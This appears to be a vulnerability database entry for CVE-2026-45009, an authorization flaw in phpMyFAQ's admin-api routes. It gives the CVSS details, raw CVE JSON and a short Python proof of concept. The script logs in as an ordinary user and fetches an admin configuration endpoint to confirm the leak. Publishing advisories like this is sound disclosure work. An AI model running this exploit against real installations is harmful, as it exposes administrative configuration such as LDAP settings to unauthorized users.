Security Vulnerability Report
中文
CVE-2026-45009 CVSS 4.3 MEDIUM

CVE-2026-45009

Published: 2026-05-15 19:17:01
Last Modified: 2026-05-15 21:16:37
Source: [email protected]

Description

phpMyFAQ before 4.1.2 contains an insufficient authorization vulnerability in admin-api routes that allows authenticated ordinary users to access administrative endpoints by only checking login status instead of verifying backend privileges. Attackers with valid frontend user accounts can access sensitive backend operational information including dashboard versions, LDAP configuration, Elasticsearch statistics, and health-check data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_poc(target_url, username, password): """ Proof of Concept for CVE-2026-45009 Demonstrates access to admin API endpoints as a regular user. """ session = requests.Session() # 1. Login as a normal user login_endpoint = f"{target_url}/index.php" login_payload = { "faqusername": username, "faqpassword": password } try: print("[+] Attempting to login as normal user...") response = session.post(login_endpoint, data=login_payload) if response.status_code != 200: print("[-] Login failed") return # 2. Access sensitive Admin API endpoint (e.g., configuration) # This endpoint typically requires admin privileges api_endpoint = f"{target_url}/admin/api/configuration" print(f"[+] Accessing protected endpoint: {api_endpoint}") api_response = session.get(api_endpoint) if api_response.status_code == 200: print("[+] Vulnerability confirmed! Sensitive data leaked:") print(api_response.text) else: print(f"[-] Access denied. Status code: {api_response.status_code}") except Exception as e: print(f"[-] An error occurred: {str(e)}") if __name__ == "__main__": # Replace with actual target and credentials target = "http://localhost/phpmyfaq" user = "user" pwd = "password" check_poc(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45009", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:01.327", "lastModified": "2026-05-15T21:16:36.800", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ before 4.1.2 contains an insufficient authorization vulnerability in admin-api routes that allows authenticated ordinary users to access administrative endpoints by only checking login status instead of verifying backend privileges. Attackers with valid frontend user accounts can access sensitive backend operational information including dashboard versions, LDAP configuration, Elasticsearch statistics, and health-check data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-jrc5-w569-h7h5", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpmyfaq-insufficient-authorization-check-in-admin-api-endpoints", "source": "[email protected]"}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-jrc5-w569-h7h5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.